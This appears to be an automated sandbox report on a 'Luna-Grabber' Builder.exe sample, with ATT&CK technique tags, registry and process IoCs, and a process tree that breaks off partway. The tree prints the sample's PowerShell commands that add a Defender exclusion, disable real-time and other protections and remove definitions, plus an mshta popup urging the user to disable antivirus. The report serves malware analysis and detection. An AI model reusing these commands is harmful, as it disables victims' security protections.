Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000389f5e6a42d68e030000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000389f5e6a0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900389f5e6a000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d389f5e6a000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000389f5e6a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe

Detects videocard installed 1 TTPs 6 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3584	WMIC.exe
2332	WMIC.exe
2420	WMIC.exe
6012	WMIC.exe
548	WMIC.exe
748	WMIC.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe

Gathers system information 1 TTPs 2 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5488	systeminfo.exe
3808	systeminfo.exe

Modifies data under HKEY_USERS 41 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	wuauclt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	wuauclt.exe

Modifies registry class 20 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{61DBD86A-8D1A-4EB0-907C-E4C1BBC8F09A}\InprocServer32\ = "%SystemRoot%\\System32\\NaturalLanguage6.dll"	TiWorker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{61DBD86A-8D1A-4EB0-907C-E4C1BBC8F09A}\InprocServer32\ThreadingModel = "Both"	TiWorker.exe
Key created	\Registry\MACHINE\SOFTWARE\Classes\CLSID\{2CB861BB-B1B4-4E14-A1A7-D3FB30C3F5CF}\InprocServer32	TiWorker.exe
Key created	\Registry\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2CB861BB-B1B4-4E14-A1A7-D3FB30C3F5CF}	TiWorker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{61DBD86A-8D1A-4EB0-907C-E4C1BBC8F09A}\InprocServer32\ = "%SystemRoot%\\System32\\NaturalLanguage6.dll"	TiWorker.exe
Key created	\Registry\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2CB861BB-B1B4-4E14-A1A7-D3FB30C3F5CF}\InprocServer32	TiWorker.exe
Key created	\Registry\MACHINE\SOFTWARE\Classes\CLSID\{61DBD86A-8D1A-4EB0-907C-E4C1BBC8F09A}	TiWorker.exe
Key created	\Registry\MACHINE\SOFTWARE\Classes\CLSID\{2CB861BB-B1B4-4E14-A1A7-D3FB30C3F5CF}	TiWorker.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\CLASSES\CLSID\{FFF3BB74-0304-43F6-9AC4-0C66FD242006}	wuauclt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2CB861BB-B1B4-4E14-A1A7-D3FB30C3F5CF}\InprocServer32\ThreadingModel = "Both"	TiWorker.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID	wuauclt.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FFF3BB74-0304-43F6-9AC4-0C66FD242006}	wuauclt.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FFF3BB74-0304-43F6-9AC4-0C66FD242006}\AppID = "{0A9D09EF-39DC-405B-9E2E-402122D19F5D}"	wuauclt.exe
Key created	\Registry\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{61DBD86A-8D1A-4EB0-907C-E4C1BBC8F09A}	TiWorker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{61DBD86A-8D1A-4EB0-907C-E4C1BBC8F09A}\InprocServer32\ThreadingModel = "Both"	TiWorker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2CB861BB-B1B4-4E14-A1A7-D3FB30C3F5CF}\InprocServer32\ThreadingModel = "Both"	TiWorker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2CB861BB-B1B4-4E14-A1A7-D3FB30C3F5CF}\InprocServer32\ = "%SystemRoot%\\System32\\NaturalLanguage6.dll"	TiWorker.exe
Key created	\Registry\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{61DBD86A-8D1A-4EB0-907C-E4C1BBC8F09A}\InprocServer32	TiWorker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2CB861BB-B1B4-4E14-A1A7-D3FB30C3F5CF}\InprocServer32\ = "%SystemRoot%\\System32\\NaturalLanguage6.dll"	TiWorker.exe
Key created	\Registry\MACHINE\SOFTWARE\Classes\CLSID\{61DBD86A-8D1A-4EB0-907C-E4C1BBC8F09A}\InprocServer32	TiWorker.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
2332	PING.EXE
4204	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5560	WMIC.exe
5560	WMIC.exe
5560	WMIC.exe
5560	WMIC.exe
5560	WMIC.exe
4036	powershell.exe
4036	powershell.exe
4020	powershell.exe
4020	powershell.exe
4036	powershell.exe
4020	powershell.exe
3584	WMIC.exe
3584	WMIC.exe
3584	WMIC.exe
3584	WMIC.exe
2332	WMIC.exe
2332	WMIC.exe
2332	WMIC.exe
2332	WMIC.exe
4240	WMIC.exe
4240	WMIC.exe
4240	WMIC.exe
4240	WMIC.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
2468	powershell.exe
2468	powershell.exe
2468	powershell.exe
5816	powershell.exe
5816	powershell.exe
5816	powershell.exe
4388	powershell.exe
4388	powershell.exe
4388	powershell.exe
4936	WMIC.exe
4936	WMIC.exe
4936	WMIC.exe
4936	WMIC.exe
2320	WMIC.exe
2320	WMIC.exe
2320	WMIC.exe
2320	WMIC.exe
5996	WMIC.exe
5996	WMIC.exe
5996	WMIC.exe
5996	WMIC.exe
4492	powershell.exe
4492	powershell.exe
4492	powershell.exe
2420	WMIC.exe
2420	WMIC.exe
2420	WMIC.exe
2420	WMIC.exe
5716	powershell.exe
5716	powershell.exe
5716	powershell.exe
6140	WMIC.exe
6140	WMIC.exe
6140	WMIC.exe
6140	WMIC.exe
6016	powershell.exe
6016	powershell.exe
3632	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3156	7zFM.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	3156	7zFM.exe
Token: 35	3156	7zFM.exe
Token: SeSecurityPrivilege	2852	TiWorker.exe
Token: SeRestorePrivilege	2852	TiWorker.exe
Token: SeBackupPrivilege	2852	TiWorker.exe
Token: SeSecurityPrivilege	2852	TiWorker.exe
Token: SeRestorePrivilege	2852	TiWorker.exe
Token: SeBackupPrivilege	2852	TiWorker.exe
Token: SeBackupPrivilege	2852	TiWorker.exe
Token: SeRestorePrivilege	2852	TiWorker.exe
Token: SeSecurityPrivilege	2852	TiWorker.exe
Token: SeBackupPrivilege	2852	TiWorker.exe
Token: SeRestorePrivilege	2852	TiWorker.exe
Token: SeSecurityPrivilege	2852	TiWorker.exe
Token: SeBackupPrivilege	2852	TiWorker.exe
Token: SeRestorePrivilege	2852	TiWorker.exe
Token: SeSecurityPrivilege	2852	TiWorker.exe
Token: SeBackupPrivilege	2852	TiWorker.exe
Token: SeRestorePrivilege	2852	TiWorker.exe
Token: SeSecurityPrivilege	2852	TiWorker.exe
Token: SeBackupPrivilege	2852	TiWorker.exe
Token: SeRestorePrivilege	2852	TiWorker.exe
Token: SeSecurityPrivilege	2852	TiWorker.exe
Token: SeBackupPrivilege	1912	vssvc.exe
Token: SeRestorePrivilege	1912	vssvc.exe
Token: SeAuditPrivilege	1912	vssvc.exe
Token: SeBackupPrivilege	2852	TiWorker.exe
Token: SeRestorePrivilege	2852	TiWorker.exe
Token: SeSecurityPrivilege	2852	TiWorker.exe
Token: SeBackupPrivilege	2852	TiWorker.exe
Token: SeRestorePrivilege	2852	TiWorker.exe
Token: SeSecurityPrivilege	2852	TiWorker.exe
Token: SeBackupPrivilege	2852	TiWorker.exe
Token: SeRestorePrivilege	2852	TiWorker.exe
Token: SeSecurityPrivilege	2852	TiWorker.exe
Token: SeBackupPrivilege	2852	TiWorker.exe
Token: SeRestorePrivilege	2852	TiWorker.exe
Token: SeSecurityPrivilege	2852	TiWorker.exe
Token: SeBackupPrivilege	2852	TiWorker.exe
Token: SeRestorePrivilege	2852	TiWorker.exe
Token: SeSecurityPrivilege	2852	TiWorker.exe
Token: SeBackupPrivilege	2852	TiWorker.exe
Token: SeRestorePrivilege	2852	TiWorker.exe
Token: SeSecurityPrivilege	2852	TiWorker.exe
Token: SeBackupPrivilege	2852	TiWorker.exe
Token: SeRestorePrivilege	2852	TiWorker.exe
Token: SeSecurityPrivilege	2852	TiWorker.exe
Token: SeBackupPrivilege	2852	TiWorker.exe
Token: SeRestorePrivilege	2852	TiWorker.exe
Token: SeSecurityPrivilege	2852	TiWorker.exe
Token: SeBackupPrivilege	2852	TiWorker.exe
Token: SeRestorePrivilege	2852	TiWorker.exe
Token: SeSecurityPrivilege	2852	TiWorker.exe
Token: SeBackupPrivilege	2852	TiWorker.exe
Token: SeRestorePrivilege	2852	TiWorker.exe
Token: SeSecurityPrivilege	2852	TiWorker.exe
Token: SeBackupPrivilege	2852	TiWorker.exe
Token: SeRestorePrivilege	2852	TiWorker.exe
Token: SeSecurityPrivilege	2852	TiWorker.exe
Token: SeBackupPrivilege	2852	TiWorker.exe
Token: SeRestorePrivilege	2852	TiWorker.exe
Token: SeSecurityPrivilege	2852	TiWorker.exe
Token: SeBackupPrivilege	2852	TiWorker.exe
Token: SeRestorePrivilege	2852	TiWorker.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
3156	7zFM.exe
3156	7zFM.exe
3156	7zFM.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2784	SecHealthUI.exe
5136	SecHealthUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2852 wrote to memory of 1904	2852	TiWorker.exe	107
PID 2852 wrote to memory of 1904	2852	TiWorker.exe	107
PID 2852 wrote to memory of 5612	2852	TiWorker.exe	119
PID 2852 wrote to memory of 5612	2852	TiWorker.exe	119
PID 3612 wrote to memory of 1060	3612	Builder.exe	138
PID 3612 wrote to memory of 1060	3612	Builder.exe	138
PID 1060 wrote to memory of 5492	1060	Builder.exe	139
PID 1060 wrote to memory of 5492	1060	Builder.exe	139
PID 1060 wrote to memory of 5488	1060	Builder.exe	140
PID 1060 wrote to memory of 5488	1060	Builder.exe	140
PID 1060 wrote to memory of 5496	1060	Builder.exe	141
PID 1060 wrote to memory of 5496	1060	Builder.exe	141
PID 1060 wrote to memory of 5484	1060	Builder.exe	142
PID 1060 wrote to memory of 5484	1060	Builder.exe	142
PID 1060 wrote to memory of 6132	1060	Builder.exe	147
PID 1060 wrote to memory of 6132	1060	Builder.exe	147
PID 6132 wrote to memory of 5560	6132	cmd.exe	149
PID 6132 wrote to memory of 5560	6132	cmd.exe	149
PID 5484 wrote to memory of 3200	5484	cmd.exe	150
PID 5484 wrote to memory of 3200	5484	cmd.exe	150
PID 5492 wrote to memory of 4036	5492	cmd.exe	151
PID 5492 wrote to memory of 4036	5492	cmd.exe	151
PID 5488 wrote to memory of 4020	5488	cmd.exe	152
PID 5488 wrote to memory of 4020	5488	cmd.exe	152
PID 5496 wrote to memory of 1268	5496	cmd.exe	153
PID 5496 wrote to memory of 1268	5496	cmd.exe	153
PID 1060 wrote to memory of 5704	1060	Builder.exe	191
PID 1060 wrote to memory of 5704	1060	Builder.exe	191
PID 5704 wrote to memory of 5780	5704	cmd.exe	158
PID 5704 wrote to memory of 5780	5704	cmd.exe	158
PID 1060 wrote to memory of 3232	1060	Builder.exe	159
PID 1060 wrote to memory of 3232	1060	Builder.exe	159
PID 3232 wrote to memory of 2860	3232	cmd.exe	161
PID 3232 wrote to memory of 2860	3232	cmd.exe	161
PID 1060 wrote to memory of 4476	1060	Builder.exe	162
PID 1060 wrote to memory of 4476	1060	Builder.exe	162
PID 4476 wrote to memory of 3584	4476	cmd.exe	164
PID 4476 wrote to memory of 3584	4476	cmd.exe	164
PID 5488 wrote to memory of 5896	5488	cmd.exe	165
PID 5488 wrote to memory of 5896	5488	cmd.exe	165
PID 1060 wrote to memory of 5888	1060	Builder.exe	166
PID 1060 wrote to memory of 5888	1060	Builder.exe	166
PID 5888 wrote to memory of 2332	5888	cmd.exe	168
PID 5888 wrote to memory of 2332	5888	cmd.exe	168
PID 1060 wrote to memory of 4324	1060	Builder.exe	169
PID 1060 wrote to memory of 4324	1060	Builder.exe	169
PID 4324 wrote to memory of 3152	4324	cmd.exe	171
PID 4324 wrote to memory of 3152	4324	cmd.exe	171
PID 1060 wrote to memory of 2344	1060	Builder.exe	172
PID 1060 wrote to memory of 2344	1060	Builder.exe	172
PID 1060 wrote to memory of 2636	1060	Builder.exe	173
PID 1060 wrote to memory of 2636	1060	Builder.exe	173
PID 2344 wrote to memory of 5432	2344	cmd.exe	176
PID 2344 wrote to memory of 5432	2344	cmd.exe	176
PID 2636 wrote to memory of 5412	2636	cmd.exe	177
PID 2636 wrote to memory of 5412	2636	cmd.exe	177
PID 1060 wrote to memory of 5472	1060	Builder.exe	178
PID 1060 wrote to memory of 5472	1060	Builder.exe	178
PID 1060 wrote to memory of 1384	1060	Builder.exe	179
PID 1060 wrote to memory of 1384	1060	Builder.exe	179
PID 1060 wrote to memory of 4380	1060	Builder.exe	182
PID 1060 wrote to memory of 4380	1060	Builder.exe	182
PID 1060 wrote to memory of 1100	1060	Builder.exe	184
PID 1060 wrote to memory of 1100	1060	Builder.exe	184

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 6 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1308	attrib.exe
2908	attrib.exe
5420	attrib.exe
4084	attrib.exe
3584	attrib.exe
3152	attrib.exe

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Obekräftade 680491.zip"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3156

C:\Windows\System32\oobe\UserOOBEBroker.exe
C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
1⤵
PID:1720

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
1⤵
- System Location Discovery: System Language Discovery
PID:2580

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe -Embedding
1⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2852
- C:\Windows\system32\wermgr.exe
  "C:\Windows\system32\wermgr.exe" "-outproc" "0" "2852" "1544" "1144" "1628" "0" "0" "1632" "1636" "0" "0" "0" "0"
  2⤵
  - Checks processor information in registry
  - Enumerates system info in registry
  PID:1904
- C:\Windows\system32\wermgr.exe
  "C:\Windows\system32\wermgr.exe" "-outproc" "0" "2852" "2508" "2104" "1964" "0" "0" "0" "0" "0" "0" "0" "0"
  2⤵
  - Checks processor information in registry
  - Enumerates system info in registry
  PID:5612

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -s LxpSvc
1⤵
PID:1384

C:\Windows\System32\FodHelper.exe
C:\Windows\System32\FodHelper.exe -Embedding
1⤵
PID:60

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:1912

C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:4
1⤵
PID:4640

C:\Windows\system32\wuauclt.exe
"C:\Windows\system32\wuauclt.exe" /UpdateDeploymentProvider UpdateDeploymentProvider.dll /ClassId 79b49b33-770e-4448-9115-d4b611aaadf3 /RunHandlerComServer
1⤵
- Loads dropped DLL
- System Binary Proxy Execution: wuauclt
- Modifies data under HKEY_USERS
- Modifies registry class
PID:2908

C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe
"C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe" -ServerName:SecHealthUI.AppXep4x2tbtjws1v9qqs0rmb3hxykvkpqtn.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:2784

C:\Windows\System32\SecurityHealthHost.exe
C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
1⤵
PID:4776

C:\Windows\System32\SecurityHealthHost.exe
C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
1⤵
PID:4044

C:\Windows\System32\SecurityHealthHost.exe
C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
1⤵
PID:2956

C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe
"C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe" -ServerName:SecHealthUI.AppXep4x2tbtjws1v9qqs0rmb3hxykvkpqtn.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:5136

C:\Windows\System32\SecurityHealthHost.exe
C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
1⤵
PID:5188

C:\Windows\System32\SecurityHealthHost.exe
C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
1⤵
PID:5312

C:\Windows\System32\SecurityHealthHost.exe
C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
1⤵
PID:5476

C:\Windows\System32\SecurityHealthHost.exe
C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
1⤵
PID:5588

C:\Windows\System32\SecurityHealthHost.exe
C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
1⤵
PID:388

C:\Windows\System32\SecurityHealthHost.exe
C:\Windows\System32\SecurityHealthHost.exe {6CED0DAA-4CDE-49C9-BA3A-AE163DC3D7AF} -Embedding
1⤵
PID:5616

C:\Windows\System32\SecurityHealthHost.exe
C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
1⤵
PID:5620

C:\Windows\System32\SecurityHealthHost.exe
C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
1⤵
PID:3784

C:\Windows\System32\SecurityHealthHost.exe
C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
1⤵
PID:5780

C:\Windows\System32\SecurityHealthHost.exe
C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
1⤵
PID:5744

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5888

C:\Users\Admin\Desktop\Luna-Grabber-main\Builder.exe
"C:\Users\Admin\Desktop\Luna-Grabber-main\Builder.exe"
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3612
- C:\Users\Admin\Desktop\Luna-Grabber-main\Builder.exe
  "C:\Users\Admin\Desktop\Luna-Grabber-main\Builder.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Luna-Grabber-main\Builder.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5492
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Luna-Grabber-main\Builder.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5488
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4020
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:5896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Failed to open Builder.exe! Please turn off your Anti-Virus. If you think this is a mistake please contact DexterWasHere#2952 on Discord', 0, 'Error02', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
